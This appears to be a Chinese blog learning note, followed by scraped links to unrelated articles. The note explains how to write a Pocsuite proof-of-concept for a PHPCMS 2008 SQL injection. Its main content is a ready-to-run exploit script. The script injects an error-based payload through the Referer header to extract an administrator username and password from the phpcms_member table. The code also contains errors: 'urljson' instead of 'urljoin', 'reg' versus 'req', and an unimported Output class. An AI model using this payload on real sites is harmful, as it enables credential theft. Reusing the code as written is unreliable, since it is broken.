在这里,首先向安全圈最大的娱乐公司,某404致敬。

  参考博文 https://www.seebug.org/help/dev 向seebug平台及该文原作者致敬,虽然并不知道是谁

  长话短说其实,可自由发挥的部分并不多,以原博文中的SQL注入的例子(web应用漏洞)来记录自己的学习心得笔记。

  感觉整篇POC能自己发挥的并不多,从代码上看,几乎90%的代码照要求填写即可,自由发挥的部分,基本就是构造URL payload,发包匹配回显。嗯,就酱。

  镣铐起舞更美是不,哎,其他的照抄吧,自由发挥的部分主要在于漏洞研究,不在于开发代码部分。抽时间还是要写一写的,想要个自己的站点balabala

 #!/usr/bin/env python

 # -*- coding:utf-8 -*-

 #import system lib files

 import os#并没有用啊,我只是很喜欢这个库的名字,觉得很好看

 import re

 import sys#并没有用啊,我还是很喜欢这个库的名字,觉得很好看

 import json#并没有用啊,我还是很喜欢这个库的名字,觉得很好看

 import urlparse

 #import pocsuite lib file下面是要用到的pocsuite框架的一些函数或者类

 from pocsuite.net import reg

 from pocsuite.poc import POCBase

 from pocsuite.utils import register

 class mytest_poc(POCBase):

     vulID = ''     #漏洞编号-ssvid

     version = 1           #poc version

     author = ["no.1 author","no.2 author",...] #author name list

     vulDate = '2011-11-21'  #vul discory(report) date

     createDate = '2015-09-23' #poc create date

     updateDate = '2015-09-23' #poc update date

     referercens = ["http://www.seebug.org/vuldb/ssvid-62274"] #参考文献

     name = '_62274_phpcms_2008_place_sql_inj_PoC' #poc script name

     appPowerLink = 'http://www.phpcms.cn' #app vendor link

     appName = 'PHPCMS'

     appVersion = ''

     vulType = 'SQL Injection' # 漏洞类型

     desc = """balabala""" #描述

     samples = ['http://10.1.200.28/']

     def _attack(self):

         result = {}

         vulurl = urlparse.urljson(self.url, '/data/js.php?id=1')

         payload = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(char(45,45),username,char(45,45,45),password,char(45,45)) from phpcms_member limit 1))a from information_schema.tables group by a)b), '0')#"

         head = {

             'Referer': payload

         }

         resp = reg.get(vulurl,headers=head)

         if resp.status_code == 200:

             match_result = re.search(r'Duplicate entry \'1--(.+)---(.+)--\' for key', resp.content, re.I | re.M)

             if match_result:

                 result['AdminInfo'] = {}

                 result['AdminInfo']['Username'] = match_result.group(1)

                 result['AdminInfo']['Password'] = match_result.group(2)

         return self.parse_attack(result)

     def _verify(self):

         result = {}

         vulurl = urlparse.urljoin(self.url, '/data/js.php?id=1')

         payload = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2), md5(1))a from information_schema.tables group by a)b), '0')#"

         head = {

             'Referer': payload

         }

         resp = req.get(vulurl, headers=head)

         if resp.status_code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:

             result['VerifyInfo'] = {}

             result['VerifyInfo']['URL'] = vulurl

             result['VerifyInfo']['Payload'] = payload

         return self.parse_attack(result)

     def parse_attack(self, result):

         output = Output(self)

         if result:

             output.success(result)

         else:

             output.fail('Internet nothing returned')

         return output

 register(mytest_poc)

  

学习POC框架pocsuite--编写hellowordPOC的更多相关文章

  1. 深入学习微框架:Spring Boot(转)

    转:http://www.infoq.com/cn/articles/microframeworks1-spring-boot/ 相关参考: https://spring.io/guides/gs/s ...

  2. 从Theano到Lasagne:基于Python的深度学习的框架和库

    从Theano到Lasagne:基于Python的深度学习的框架和库 摘要:最近,深度神经网络以“Deep Dreams”形式在网站中如雨后春笋般出现,或是像谷歌研究原创论文中描述的那样:Incept ...

  3. 深入浅出学习Hibernate框架(一):从实例入手初识Hibernate框架

    这篇博客是hibernate学习的第一篇,主要简介hibernate框架,之后简单说一下hibernate的文件夹结构,最后写一个简单的hibernate实例.通过这三步来简单的认识一下hiberna ...

  4. 学习测试框架Mocha

    学习测试框架Mocha 注意:是参考阮老师的文章来学的.虽然阮老师有讲解,但是觉得自己敲一遍,然后记录一遍效果会更好点.俗话说,好记性不如烂笔头. Mocha 是javascript测试框架之一,可以 ...

  5. 深入浅出学习Hibernate框架(二):JDBC基础操作

    上篇博客<深入浅出学习Hibernate框架(一):从实例入手初识Hibernate框架>简单介绍了一下Hibernate框架,并且举了一个实例来了解Hibernate.这篇博客将介绍JD ...

  6. 深度学习Keras框架笔记之TimeDistributedDense类

    深度学习Keras框架笔记之TimeDistributedDense类使用方法笔记 例: keras.layers.core.TimeDistributedDense(output_dim,init= ...

  7. 深度学习Keras框架笔记之Dense类(标准的一维全连接层)

    深度学习Keras框架笔记之Dense类(标准的一维全连接层) 例: keras.layers.core.Dense(output_dim,init='glorot_uniform', activat ...

  8. 【课程学习】课程2:十行代码高效完成深度学习POC

    本文用户记录黄埔学院学习的心得,并补充一些内容. 课程2:十行代码高效完成深度学习POC,主讲人为百度深度学习技术平台部:陈泽裕老师. 因为我是CV方向的,所以内容会往CV方向调整一下,有所筛检. 课 ...

  9. 学习mybatis框架>从零开始学JAVA

    目录 学习mybatis框架 mybatis框架的介绍 什么是mybatis框架 为什么要使用mybatis框架 mybatis的优点 Mybatis框架环境搭建 去官网下载jar包 创建一个普通的j ...

随机推荐

  1. CodeIgniter(3.1.4)框架中-使用多个公共控制器

    项目目录结构: 在core/MY_Controller.php文件下: <?php /** * Class MY_Controller * 自定义控制器 */ class MY_Controll ...

  2. 【转】Linux内核源码分析方法

    一.内核源码之我见 Linux内核代码的庞大令不少人“望而生畏”,也正因为如此,使得人们对Linux的了解仅处于泛泛的层次.如果想透析Linux,深入操作系统的本质,阅读内核源码是最有效的途径.我们都 ...

  3. Floyd算法思想

    关键词:代数.图论.矩阵.松弛技术.动态规划 Floyd算法是一个经典的动态规划算法.用通俗的语言来描述的话,首先我们的目标是寻找从点i到点j的最短路径.从动态规划的角度看问题,我们需要为这个目标重新 ...

  4. spring FactoryBean配置Bean

    概要: 实例代码具体解释: 文件夹结构 Car.java package com.coslay.beans.factorybean; public class Car { private String ...

  5. Sqrt算法

    转自原文:http://www.cnblogs.com/pkuoliver/archive/2010/10/06/sotry-about-sqrt.html 一个Sqrt函数引发的血案 2010-10 ...

  6. redis windows 版配置使用

    网上下载windows版的redis 在D盘新建redis目录 把下载的redis压缩包解压到redis目录,如图: 打开配置文件 redis.windows.conf 把 SECURITY下的req ...

  7. React封装RadioGroup

    class RadioGroup extends React.Component { getRadioComponent(item, index) { return <div className ...

  8. React中props与state

    以下内容均为个人理解. 1.state: 在react中,state可以看成管理页面状态的集合(实则一个对象而已),库里面的成员均为页面渲染变量,整个页面为一个状态机,当state发生变化时,页面会重 ...

  9. 设置div滚动条

    这个是很常见的一个任务了,基本是通过CSS去实现滚动条. 滚动条 设置是否显示滚动条主要是在CSS中设置下列的属性: 代码如下: overflow:visible|auto|hidden|scroll ...

  10. html 输入框只允许输入数字

    要想限制文本框只能输入数字,你可以用Html5的标签就可以解决: 为input标签添加样式 type="number"即可. // 限制输入框的数字输入范围 var strPri ...